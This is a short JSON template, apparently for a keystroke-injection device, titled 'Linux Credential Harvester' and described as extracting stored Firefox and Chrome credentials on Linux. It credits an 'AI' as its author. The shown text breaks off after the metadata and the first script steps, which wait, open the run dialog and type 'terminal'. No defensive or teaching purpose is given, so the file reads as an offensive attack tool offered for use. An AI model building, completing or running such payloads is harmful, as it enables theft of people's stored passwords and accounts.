{
  "metadata": {
    "name": "Linux Credential Harvester",
    "description": "Extracts stored credentials from Linux systems",
    "version": "1.0",
    "author": "Natasha AI"
  },
  "templates": [
    {
      "name": "Browser Credentials",
      "description": "Extracts credentials from Firefox and Chrome on Linux",
      "attack_type": "credential_harvest",
      "script": [
        "REM Linux Browser Credential Harvester",
        "REM Generated by Natasha AI",
        "DELAY 1000",
        "ALT F2",
        "DELAY 500",
        "STRING terminal",
        "DELAY 500",
